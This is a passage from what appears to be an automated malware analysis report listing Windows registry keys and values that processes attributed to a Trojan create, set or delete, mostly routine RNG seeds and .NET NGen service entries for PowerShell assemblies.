[HKLM\SOFTWARE\Microsoft\ESENT\Process\InstallationStatsUploder_12052016001648\DEBUG]
"Trace Level" = ""
[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"TypesSupported" = "7"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"ControlFlags" = "1"
[HKLM\System\CurrentControlSet\Services\Eventlog\Application\NetworkAnalyser[APP_SETTINGS]]
"EventMessageFile" = "%WinDir%\Microsoft.NET\Framework\v2.0.50727\EventLogMessages.dll"
The Trojan deletes the following value(s) in system registry:
[HKLM\SOFTWARE\Microsoft\ESENT\Process\InstallationStatsUploder_12052016001648\DEBUG]
"Trace Level"
The process EditBinx86.exe:960 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "EA E5 8E F0 E7 CA EA 3F CE 75 75 51 8C 22 70 5A"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
The process EditBinx86.exe:2012 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "A1 E5 84 5C A6 43 C4 15 B2 24 7E 83 52 2E 9C 3B"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
The process mofcomp.exe:2684 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "95 9D 1A 22 B3 D5 F3 83 3A C0 4E DF 55 77 DC 48"
The process ngen.exe:332 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "31 52 8F 0E 0F FA 54 00 3C E6 E9 85 AF CF D1 41"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Management,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Scenario" = "32"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Management,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority" = "1"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Management,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "3"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Management,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "2"
The process ngen.exe:276 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "1A 42 5E 7B 1C 3C ED 78 F2 D8 6D 10 D1 D6 E7 A8"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Utility,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Scenario" = "32"
"Status" = "2"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Utility,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "3"
"Priority" = "1"
The process ngen.exe:2092 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "BC BC 87 5E C4 4B 42 DA 03 E4 1B 73 41 F3 35 30"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.BackgroundIntelligentTransfer.Management,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority" = "1"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.BackgroundIntelligentTransfer.Management,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "3"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.BackgroundIntelligentTransfer.Management,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Scenario" = "32"
"Status" = "2"
The process ngen.exe:3300 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "92 A9 17 10 EE 21 29 53 AE EB 9E FC 90 17 0B 63"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.GPowerShell,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority" = "1"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.GPowerShell,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "3"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.GPowerShell,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Scenario" = "32"
"Status" = "2"
The process ngen.exe:2136 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "FC 09 10 67 51 15 9D 57 7A E3 D9 52 55 2E AA DB"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\System.Management.Automation.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority" = "1"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\System.Management.Automation.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "2"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\System.Management.Automation.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "3"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\System.Management.Automation.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Scenario" = "32"
The process ngen.exe:3212 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "47 23 51 0A C4 D3 1B 8E D4 36 75 54 CC B8 14 3C"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.GraphicalHost,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "3"
"Priority" = "1"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.GraphicalHost,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "2"
"Scenario" = "32"
The process ngen.exe:2056 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "0D C7 50 60 27 4B FE 93 B0 6B 67 B2 C8 0C 81 3C"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Diagnostics,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Scenario" = "32"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Diagnostics,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority" = "1"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Diagnostics,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "3"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Diagnostics,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "2"
The process ngen.exe:3340 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "DC 66 A5 80 52 1D 5B 49 5E AA CC B0 11 26 CC B2"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.GraphicalHost.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority" = "1"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.GraphicalHost.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Scenario" = "32"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.GraphicalHost.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "3"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.GraphicalHost.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "2"
The process ngen.exe:2248 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "9C 1F 51 28 15 7E 25 A2 89 F6 BD 7D 1A 9F B1 FF"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.WSMan.Management.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "2"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.WSMan.Management.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority" = "1"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.WSMan.Management.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "3"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.WSMan.Management.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Scenario" = "32"
The process ngen.exe:3160 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "96 78 37 B4 FA 2C 40 32 08 6C 84 2A 83 4B AC 76"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.GPowerShell.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority" = "1"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.GPowerShell.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "2"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.GPowerShell.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "3"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.GPowerShell.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Scenario" = "32"
The process ngen.exe:2112 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "63 2C 28 A0 93 3F 82 43 91 58 77 A9 CE A5 93 A0"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.WSMan.Management,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority" = "1"
"Status" = "3"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.WSMan.Management,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "2"
"Scenario" = "32"
The process ngen.exe:2240 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "BD 9B 37 65 8B E3 AF 8E B6 40 00 D9 72 1D 5E C1"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Diagnostics.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "2"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Diagnostics.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority" = "1"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Diagnostics.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Scenario" = "32"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Diagnostics.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "3"
The process ngen.exe:3232 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "1D E4 30 C1 23 15 FA 7F 14 8A 61 97 FF 5F DC 4F"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Editor.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "2"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Editor.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "3"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Editor.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority" = "1"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Editor.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Scenario" = "32"
The process ngen.exe:444 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "67 6E 41 68 A3 E8 49 37 B2 5D DE DD E2 CB C2 65"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Security,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority" = "1"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Security,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "2"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Security,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "3"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Security,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Scenario" = "32"
The process ngen.exe:1496 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "8E 74 96 77 0C 45 17 E3 2A 02 94 A4 CA 17 AE 2F"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots]
"WorkPending" = "1"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\System.Management.Automation,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "3"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\System.Management.Automation,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "2"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\System.Management.Automation,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Scenario" = "32"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\System.Management.Automation,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority" = "1"
The process ngen.exe:2188 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "47 75 9E 1D C8 09 E6 CF 31 04 66 46 2F 29 63 10"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Utility.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "2"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Utility.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "3"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Utility.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority" = "1"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Utility.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Scenario" = "32"
The process ngen.exe:2212 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "88 36 76 ED 77 8E 25 B8 EE 75 82 97 3D 45 CF 7C"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Security.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Scenario" = "32"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Security.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "3"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Security.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "2"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Security.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority" = "1"
The process ngen.exe:2276 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "17 A5 77 22 60 9E B8 46 4A 13 34 46 7E C4 A3 37"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.BackgroundIntelligentTransfer.Management.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority" = "1"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.BackgroundIntelligentTransfer.Management.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Scenario" = "32"
"Status" = "2"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.BackgroundIntelligentTransfer.Management.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "3"
The process ngen.exe:780 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "2E E9 28 A8 56 46 5F 94 4C 7D 77 53 42 7F 27 AC"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.WSMan.Runtime,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Scenario" = "32"
"Status" = "2"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.WSMan.Runtime,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority" = "1"
"Status" = "3"
The process ngen.exe:3224 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "72 D1 27 E7 BC 72 B6 0F A7 59 87 F5 AE A3 83 4D"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Editor,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority" = "1"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Editor,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "2"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Editor,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "3"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Editor,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Scenario" = "32"
The process ngen.exe:2024 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "1D C9 31 3B 33 6B 23 CB 5E 5B BD 70 DF 4A B3 3B"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.ConsoleHost,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "3"
"Priority" = "1"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.ConsoleHost,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Scenario" = "32"
"Status" = "2"
The process ngen.exe:2160 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "A4 C3 3B 65 C7 8A 27 F9 36 85 C5 5C 10 52 26 22"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Management.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "2"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Management.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "3"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Management.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority" = "1"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Management.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Scenario" = "32"
The process ngen.exe:2148 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "72 1D 07 5F D9 AC 10 EB 38 48 A6 47 4E 8D 28 81"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.ConsoleHost.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Scenario" = "32"
